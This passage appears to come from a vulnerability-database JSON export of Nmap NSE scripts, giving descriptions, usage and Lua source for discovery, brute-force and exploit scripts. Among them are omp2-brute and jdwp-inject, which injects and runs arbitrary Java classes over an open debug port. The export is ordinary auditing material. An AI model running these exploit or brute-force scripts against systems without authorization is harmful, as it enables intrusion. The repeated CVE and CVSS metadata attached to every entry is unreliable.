if not t['6'][j] then j = j-1; break end\n len = len + t['6'][j]:len() + 1\n if len > 71 then\n j = j-1\n else\n j = j+1\n end\n until len > 71\n for n = i, j, 1 do\n work[#work+1] = t['6'][n]\n end\n o[#o+1] = table.concat(work, ' ')\n i = j+1\n end\n return o\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:40:54", "description": "Lists remote file systems by querying the remote device using the Network Data Management Protocol (ndmp). NDMP is a protocol intended to transport data between a NAS device and the backup device, removing the need for the data to pass through the backup server. 
The following products are known to support the protocol: \n\n * Amanda \n * Bacula \n * CA Arcserve \n * CommVault Simpana \n * EMC Networker \n * Hitachi Data Systems \n * IBM Tivoli \n * Quest Software Netvault Backup \n * Symantec Netbackup \n * Symantec Backup Exec\n\n## Example Usage \n \n \n nmap -p 10000 --script ndmp-fs-info <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON VERSION\n 10000/tcp open ndmp syn-ack Symantec/Veritas Backup Exec ndmp\n | ndmp-fs-info:\n | FS Logical device Physical device\n | NTFS C: Device0000\n | NTFS E: Device0000\n | UNKNOWN Shadow Copy Components Device0000\n |_UNKNOWN System State Device0000\n \n \n\n## Requires \n\n * [ndmp](<../lib/ndmp.html>)\n * [shortport](<../lib/shortport.html>)\n * [tab](<../lib/tab.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-02-19T14:56:17", "type": "nmap", "title": "ndmp-fs-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-07-28T16:06:18", "id": "NMAP:NDMP-FS-INFO.NSE", "href": 
"https://nmap.org/nsedoc/scripts/ndmp-fs-info.html", "sourceData": "local ndmp = require \"ndmp\"\nlocal shortport = require \"shortport\"\nlocal tab = require \"tab\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nLists remote file systems by querying the remote device using the Network\nData Management Protocol (ndmp). NDMP is a protocol intended to transport\ndata between a NAS device and the backup device, removing the need for the\ndata to pass through the backup server. The following products are known\nto support the protocol:\n* Amanda\n* Bacula\n* CA Arcserve\n* CommVault Simpana\n* EMC Networker\n* Hitachi Data Systems\n* IBM Tivoli\n* Quest Software Netvault Backup\n* Symantec Netbackup\n* Symantec Backup Exec\n]]\n\n---\n-- @usage\n-- nmap -p 10000 --script ndmp-fs-info <ip>\n--\n-- @output\n-- PORT STATE SERVICE REASON VERSION\n-- 10000/tcp open ndmp syn-ack Symantec/Veritas Backup Exec ndmp\n-- | ndmp-fs-info:\n-- | FS Logical device Physical device\n-- | NTFS C: Device0000\n-- | NTFS E: Device0000\n-- | UNKNOWN Shadow Copy Components Device0000\n-- |_UNKNOWN System State Device0000\n--\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service(10000, \"ndmp\", \"tcp\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n local helper = ndmp.Helper:new(host, port)\n local status, msg = helper:connect()\n if ( not(status) ) then return fail(\"Failed to connect to server\") end\n\n status, msg = helper:getFsInfo()\n if ( not(status) ) then return fail(\"Failed to get filesystem information from server\") end\n if ( msg.header.error == ndmp.NDMP.ErrorType.NOT_AUTHORIZED_ERROR ) then return fail(\"Not authorized to get filesystem information from server\") end\n helper:close()\n\n local result = tab.new(3)\n tab.addrow(result, \"FS\", \"Logical device\", \"Physical 
device\")\n\n for _, item in ipairs(msg.fsinfo) do\n if ( item.fs_logical_device and #item.fs_logical_device ~= 0 ) then\n if ( item and item.fs_type and item.fs_logical_device and item.fs_physical_device ) then\n tab.addrow(result, item.fs_type, item.fs_logical_device:gsub(\"?\", \" \"), item.fs_physical_device)\n end\n end\n end\n\n return \"\\n\" .. tab.dump(result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:39:29", "description": "Performs brute force password auditing against the OpenVAS manager using OMPv2.\n\n## Script Arguments \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### omp2.password, omp2.username \n\nSee the documentation for the [omp2](<../lib/omp2.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap -p 9390 --script omp2-brute <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 9390/tcp open openvas syn-ack\n | omp2-brute:\n | Accounts\n |_ admin:secret => Valid credentials\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [omp2](<../lib/omp2.html>)\n * [shortport](<../lib/shortport.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-04-20T23:44:16", "type": "nmap", "title": "omp2-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-03-10T03:09:39", "id": "NMAP:OMP2-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/omp2-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal omp2 = require \"omp2\"\nlocal shortport = require \"shortport\"\n\ndescription = [[\nPerforms brute force password auditing against the OpenVAS manager using OMPv2.\n]]\n\n---\n-- @usage\n-- nmap -p 9390 --script omp2-brute <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 9390/tcp open openvas syn-ack\n-- | 
omp2-brute:\n-- | Accounts\n-- |_ admin:secret => Valid credentials\n--\n\nauthor = \"Henri Doreau\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"brute\", \"intrusive\"}\n\n\nportrule = shortport.port_or_service(9390, \"openvas\")\n\n\nDriver = {\n new = function(self, host, port)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.session = omp2.Session:new(brute.new_socket())\n return o\n end,\n\n --- Connects to the OpenVAS Manager\n --\n -- @return status boolean for connection success/failure\n -- @return err string describing the error on failure\n connect = function(self)\n return self.session:connect(self.host, self.port)\n end,\n\n --- Closes connection\n --\n -- @return status boolean for closing success/failure\n disconnect = function(self)\n return self.session:close()\n end,\n\n --- Attempts to login the the OpenVAS Manager using a given username/password\n -- couple. Store the credentials in the registry on success.\n --\n -- @param username string containing the login username\n -- @param password string containing the login password\n -- @return status boolean for login success/failure\n -- @return err string describing the error on failure\n login = function(self, username, password)\n if self.session:authenticate(username, password) then\n -- store the account for possible future use\n omp2.add_account(self.host, username, password)\n return true, creds.Account:new(username, password, creds.State.VALID)\n else\n return false, brute.Error:new(\"login failed\")\n end\n end,\n\n}\n\naction = function(host, port)\n local engine = brute.Engine:new(Driver, host, port)\n engine.options.script_name = SCRIPT_NAME\n local status, result = engine:start()\n return result\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:27", "description": "Attempts to enumerate process info over the Apple Remote Event protocol. 
When accessing an application over the Apple Remote Event protocol the service responds with the uid and pid of the application, if it is running, prior to requesting authentication.\n\n## Example Usage \n \n \n nmap -p 3031 <ip> --script eppc-enum-processes\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 3031/tcp open eppc\n | eppc-enum-processes:\n | application uid pid\n | Address Book 501 269\n | Facetime 501 495\n | Finder 501 274\n | iPhoto 501 267\n | Photo booth 501 471\n | Remote Buddy 501 268\n | Safari 501 270\n | Terminal 501 266\n | Transmission 501 265\n |_VLC media player 501 367\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [tab](<../lib/tab.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-05-29T18:25:49", "type": "nmap", "title": "eppc-enum-processes NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-01T18:50:19", "id": "NMAP:EPPC-ENUM-PROCESSES.NSE", "href": 
"https://nmap.org/nsedoc/scripts/eppc-enum-processes.html", "sourceData": "local nmap = require('nmap')\nlocal shortport = require('shortport')\nlocal stdnse = require('stdnse')\nlocal string = require('string')\nlocal tab = require('tab')\n\ndescription = [[\nAttempts to enumerate process info over the Apple Remote Event protocol.\nWhen accessing an application over the Apple Remote Event protocol the\nservice responds with the uid and pid of the application, if it is running,\nprior to requesting authentication.\n]]\n\n---\n-- @usage\n-- nmap -p 3031 <ip> --script eppc-enum-processes\n--\n-- @output\n-- PORT STATE SERVICE\n-- 3031/tcp open eppc\n-- | eppc-enum-processes:\n-- | application uid pid\n-- | Address Book 501 269\n-- | Facetime 501 495\n-- | Finder 501 274\n-- | iPhoto 501 267\n-- | Photo booth 501 471\n-- | Remote Buddy 501 268\n-- | Safari 501 270\n-- | Terminal 501 266\n-- | Transmission 501 265\n-- |_VLC media player 501 367\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\nportrule = shortport.port_or_service(3031, \"eppc\", \"tcp\", \"open\")\n\naction = function( host, port )\n\n local socket = nmap.new_socket()\n socket:set_timeout(5000)\n\n local try = nmap.new_try(\n function()\n stdnse.debug1(\"failed\")\n socket:close()\n end\n )\n\n -- a list of application that may or may not be running on the target\n local apps = {\n \"Address Book\",\n \"App Store\",\n \"Facetime\",\n \"Finder\",\n \"Firefox\",\n \"Google Chrome\",\n \"iChat\",\n \"iPhoto\",\n \"Keychain Access\",\n \"iTunes\",\n \"Photo booth\",\n \"QuickTime Player\",\n \"Remote Buddy\",\n \"Safari\",\n \"Spotify\",\n \"Terminal\",\n \"TextMate\",\n \"Transmission\",\n \"VLC\",\n \"VLC media player\",\n }\n\n local results = tab.new(3)\n tab.addrow( results, \"application\", \"uid\", \"pid\" )\n\n for _, app in ipairs(apps) do\n try( socket:connect(host, port, \"tcp\") )\n local data\n\n 
local packets = {\n \"PPCT\\0\\0\\0\\1\\0\\0\\0\\1\",\n -- unfortunately I've found no packet specifications, so this has to do\n stdnse.fromhex(\"e44c50525401e101\")\n .. string.pack(\"Bs1\", 225 + #app, app)\n .. stdnse.fromhex(\"dfdbe302013ddfdfdfdfd500\"),\n }\n\n for _, v in ipairs(packets) do\n try( socket:send(v) )\n data = try( socket:receive() )\n end\n\n local uid, pid = data:match(\"uid=(%d+)&pid=(%d+)\")\n if ( uid and pid ) then tab.addrow( results, app, uid, pid ) end\n\n try( socket:close() )\n end\n\n return \"\\n\" .. tab.dump(results)\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:39", "description": "Shows AFP shares and ACLs.\n\n## Script Arguments \n\n#### afp.password, afp.username \n\nSee the documentation for the [afp](<../lib/afp.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sV --script=afp-showmount <target>\n\n## Script Output \n \n \n PORT STATE SERVICE\n 548/tcp open afp\n | afp-showmount:\n | Yoda's Public Folder\n | Owner: Search,Read,Write\n | Group: Search,Read\n | Everyone: Search,Read\n | User: Search,Read\n | Vader's Public Folder\n | Owner: Search,Read,Write\n | Group: Search,Read\n | Everyone: Search,Read\n | User: Search,Read\n |_ Options: IsOwner\n\n## Requires \n\n * [afp](<../lib/afp.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-01-20T21:49:30", "type": "nmap", "title": "afp-showmount NSE Script", "bulletinFamily": 
"scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:AFP-SHOWMOUNT.NSE", "href": "https://nmap.org/nsedoc/scripts/afp-showmount.html", "sourceData": "local afp = require \"afp\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nShows AFP shares and ACLs.\n]]\n\n---\n--\n--@output\n-- PORT STATE SERVICE\n-- 548/tcp open afp\n-- | afp-showmount:\n-- | Yoda's Public Folder\n-- | Owner: Search,Read,Write\n-- | Group: Search,Read\n-- | Everyone: Search,Read\n-- | User: Search,Read\n-- | Vader's Public Folder\n-- | Owner: Search,Read,Write\n-- | Group: Search,Read\n-- | Everyone: Search,Read\n-- | User: Search,Read\n-- |_ Options: IsOwner\n\n-- Version 0.4\n-- Created 01/03/2010 - v0.1 - created by Patrik Karlsson\n-- Revised 01/13/2010 - v0.2 - Fixed a bug where a single share wouldn't show due to formatting issues\n-- Revised 01/20/2010 - v0.3 - removed superfluous functions\n-- Revised 05/03/2010 - v0.4 - cleaned up and added dependency to afp-brute and added support for credentials\n-- by argument or registry\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\ndependencies = {\"afp-brute\"}\n\nportrule = shortport.portnumber(548, \"tcp\")\n\naction = function(host, port)\n\n local status, response, shares\n local result = {}\n local 
afpHelper = afp.Helper:new()\n local args = nmap.registry.args\n local users = nmap.registry.afp or { ['nil'] = 'nil' }\n\n if ( args['afp.username'] ) then\n users = {}\n users[args['afp.username']] = args['afp.password']\n end\n\n for username, password in pairs(users) do\n\n status, response = afpHelper:OpenSession(host, port)\n if ( not status ) then\n stdnse.debug1(\"%s\", response)\n return\n end\n\n -- if we have a username attempt to authenticate as the user\n -- Attempt to use No User Authentication?\n if ( username ~= 'nil' ) then\n status, response = afpHelper:Login(username, password)\n else\n status, response = afpHelper:Login()\n end\n\n if ( not status ) then\n stdnse.debug1(\"Login failed\")\n stdnse.debug3(\"Login error: %s\", response)\n return\n end\n\n status, shares = afpHelper:ListShares()\n\n if status then\n for _, vol in ipairs( shares ) do\n local status, response = afpHelper:GetSharePermissions( vol )\n if status then\n response.name = vol\n table.insert(result, response)\n end\n end\n end\n\n status, response = afpHelper:Logout()\n status, response = afpHelper:CloseSession()\n\n if ( result ) then\n return stdnse.format_output(true, result)\n end\n end\n return\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:43", "description": "Detects the Skype version 2 service.\n\n## Example Usage \n \n \n nmap -sV <target>\n\n## Script Output \n \n \n PORT STATE SERVICE VERSION\n 80/tcp open skype2 Skype\n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2008-11-06T02:52:59", "type": "nmap", "title": "skypev2-version NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-15T02:23:09", "id": "NMAP:SKYPEV2-VERSION.NSE", "href": "https://nmap.org/nsedoc/scripts/skypev2-version.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal U = require \"lpeg-utility\"\n\ndescription = [[\nDetects the Skype version 2 service.\n]]\n\n---\n-- @output\n-- PORT STATE SERVICE VERSION\n-- 80/tcp open skype2 Skype\n\nauthor = \"Brandon Enright\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"version\"}\n\n\nportrule = function(host, port)\n return (port.number == 80 or port.number == 443 or\n port.service == nil or port.service == \"\" or\n port.service == \"unknown\")\n and port.protocol == \"tcp\" and port.state == \"open\"\n and port.version.name_confidence < 10\n and not(shortport.port_is_excluded(port.number,port.protocol))\n and nmap.version_intensity() >= 7\nend\n\naction = function(host, port)\n local result, rand\n -- Did the service engine already do the hard work?\n if port.version and port.version.service_fp then\n -- Probes sent, replies received, but no match.\n result = U.get_response(port.version.service_fp, 
\"GetRequest\")\n -- Loop through the ASCII probes most likely to receive random response\n -- from Skype. Others will also receive this response, but are harder to\n -- distinguish from an echo service.\n for _, p in ipairs({\"HTTPOptions\", \"RTSPRequest\"}) do\n rand = U.get_response(port.version.service_fp, p)\n if rand then\n break\n end\n end\n end\n local status\n if not result then\n -- Have to send the probe ourselves.\n status, result = comm.exchange(host, port,\n \"GET / HTTP/1.0\\r\\n\\r\\n\", {bytes=26})\n\n if (not status) then\n return nil\n end\n end\n\n if (result ~= \"HTTP/1.0 404 Not Found\\r\\n\\r\\n\") then\n return\n end\n\n -- So far so good, now see if we get random data for another request\n if not rand then\n status, rand = comm.exchange(host, port,\n \"random data\\r\\n\\r\\n\", {bytes=15})\n\n if (not status) then\n return\n end\n end\n\n if string.match(rand, \"[^%s!-~].*[^%s!-~].*[^%s!-~]\") then\n -- Detected\n port.version.name = \"skype2\"\n port.version.product = \"Skype\"\n nmap.set_port_version(host, port)\n return\n end\n return\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:18", "description": "Attempts to exploit java's remote debugging port. When remote debugging port is left open, it is possible to inject java bytecode and achieve remote code execution. This script allows injection of arbitrary class files. \n\nAfter injection, class' run() method is executed. Method run() has no parameters, and is expected to return a string. \n\nYou must specify your own .class file to inject by `filename` argument. 
See nselib/data/jdwp-class/README for more.\n\n## Script Arguments \n\n#### jdwp-inject.filename \n\nJava `.class` file to inject.\n\n## Example Usage \n \n \n nmap -sT <target> -p <port> --script=+jdwp-inject --script-args filename=HelloWorld.class\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 2010/tcp open search syn-ack\n | jdwp-inject:\n |_ Hello world from the remote machine!\n\n## Requires \n\n * [io](<>)\n * [jdwp](<../lib/jdwp.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-14T11:31:08", "type": "nmap", "title": "jdwp-inject NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-08-29T03:06:40", "id": "NMAP:JDWP-INJECT.NSE", "href": "https://nmap.org/nsedoc/scripts/jdwp-inject.html", "sourceData": "local io = require \"io\"\nlocal jdwp = require \"jdwp\"\nlocal stdnse = require \"stdnse\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require 
\"string\"\n\ndescription = [[\nAttempts to exploit java's remote debugging port. When remote debugging port\nis left open, it is possible to inject java bytecode and achieve remote code\nexecution. This script allows injection of arbitrary class files.\n\nAfter injection, class' run() method is executed.\nMethod run() has no parameters, and is expected to return a string.\n\nYou must specify your own .class file to inject by <code>filename</code> argument.\nSee nselib/data/jdwp-class/README for more.\n]]\n\n---\n-- @usage nmap -sT <target> -p <port> --script=+jdwp-inject --script-args filename=HelloWorld.class\n--\n-- @args jdwp-inject.filename Java <code>.class</code> file to inject.\n-- @output\n-- PORT STATE SERVICE REASON\n-- 2010/tcp open search syn-ack\n-- | jdwp-inject:\n-- |_ Hello world from the remote machine!\n\nauthor = \"Aleksandar Nikolic\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\",\"intrusive\"}\n\nportrule = function(host, port)\n -- JDWP will close the port if there is no valid handshake within 2\n -- seconds, Service detection's NULL probe detects it as tcpwrapped.\n return port.service == \"tcpwrapped\"\n and port.protocol == \"tcp\" and port.state == \"open\"\n and not(shortport.port_is_excluded(port.number,port.protocol))\nend\n\naction = function(host, port)\n stdnse.sleep(5) -- let the remote socket recover from connect() scan\n local status,socket = jdwp.connect(host,port) -- initialize the connection\n if not status then\n stdnse.debug1(\"error, %s\",socket)\n return nil\n end\n\n -- read .class file\n local filename = stdnse.get_script_args(SCRIPT_NAME .. 
'.filename')\n if filename == nil then\n return stdnse.format_output(false, \"This script requires a .class file to inject.\")\n end\n local file = io.open(nmap.fetchfile(filename) or filename, \"rb\")\n local class_bytes = file:read(\"a\")\n file:close()\n\n -- inject the class\n local injectedClass\n status,injectedClass = jdwp.injectClass(socket,class_bytes)\n if not status then\n stdnse.debug1(\"Failed to inject class\")\n return stdnse.format_output(false, \"Failed to inject class\")\n end\n -- find injected class method\n local runMethodID = jdwp.findMethod(socket,injectedClass.id,\"run\",false)\n\n if runMethodID == nil then\n stdnse.debug1(\"Couldn't find run method\")\n return stdnse.format_output(false, \"Couldn't find run method.\")\n end\n\n -- invoke run method\n local result\n status, result = jdwp.invokeObjectMethod(socket,0,injectedClass.instance,injectedClass.thread,injectedClass.id,runMethodID,0,nil)\n if not status then\n stdnse.debug1(\"Couldn't invoke run method\")\n return stdnse.format_output(false, result)\n end\n -- get the result string\n local stringID = string.unpack(\">x I8\",result)\n status,result = jdwp.readString(socket,0,stringID)\n -- parse results\n return stdnse.format_output(status,result)\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:48", "description": "Runs a query against IBM Informix Dynamic Server using the given authentication credentials (see also: informix-brute).\n\n## Script Arguments \n\n#### informix-query.query \n\nThe query to run against the server (default: returns hostname and version)\n\n#### informix-query.username \n\nThe username used for authentication\n\n#### informix-query.database \n\nThe name of the database to connect to (default: sysmaster)\n\n#### informix-query.instance \n\nThe name of the instance to connect to\n\n#### informix-query.password \n\nThe password used for authentication\n\n#### informix.instance \n\nSee the documentation 
for the [informix](<../lib/informix.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 9088 <host> --script informix-query --script-args informix-query.username=informix,informix-query.password=informix\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 9088/tcp open unknown syn-ack\n | informix-query:\n | Information\n | User: informix\n | Database: sysmaster\n | Query: \"SELECT FIRST 1 DBINFO('dbhostname') hostname, DBINFO('version','full') version FROM systables\"\n | Results\n | hostname version\n |_ patrik-laptop IBM Informix Dynamic Server Version 11.50.UC4E\n \n\n## Requires \n\n * [informix](<../lib/informix.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-19T22:47:52", "type": "nmap", "title": "informix-query NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": 